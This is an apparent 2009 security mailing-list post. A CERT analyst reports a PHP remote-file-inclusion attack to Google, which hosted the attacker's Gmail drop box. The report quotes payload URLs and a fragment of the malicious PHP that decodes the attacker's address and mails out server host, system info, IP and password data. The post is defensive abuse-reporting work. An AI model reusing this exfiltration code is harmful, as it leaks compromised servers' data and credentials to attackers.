[nsp-sec] Attn google - gmail drop box - rfi attack
Chris Morrow
morrowc at ops-netman.net
Mon Jun 1 16:30:11 EDT 2009
assume it's 'ok' to pass this (minus headers/listinfos) on to the internal
abuse@ folks yes?
On Mon, 1 Jun 2009, Rodolfo Baader wrote:
> ----------- nsp-security Confidential --------
>
> Hi!
>
> While investigating the following URLS involved in a RFI attack
> -http://compraloenlinea.com.mx//copyright[1].txt
> -http://compraloenlinea.com.mx//readme[1].txt
>
> we found that the attacker was sending information to the following email address:
> $creator="fr33sh3ll at gmail.com"
>
> See below [*1] for part of the code we found.
>
> Could you please investigate and take the appropriate actions.
>
> Regards,
> R.
>
> *===========================================================
> [*1] Piece of the code
> ...
> $creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
> ($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
> $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
> $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 =
> gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
> $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2
> $pwds";
> $from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
> mail( $creator, $subj, $msg, $from);
>
> *===========================================================
>
> --
> -----------------------------------------------
> ArCERT - http://www.arcert.gov.ar
>
> Te: (54-11) 4343-9001 int.512/514 | 4345-0383
> Fax:(54-11) 4343-7458
>
> Av.R. Saenz Peña 511 - Of:514
> C1035AAA - Ciudad Autonoma de Buenos Aires
> Argentina
> -----------------------------------------------
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
More information about the nsp-security
mailing list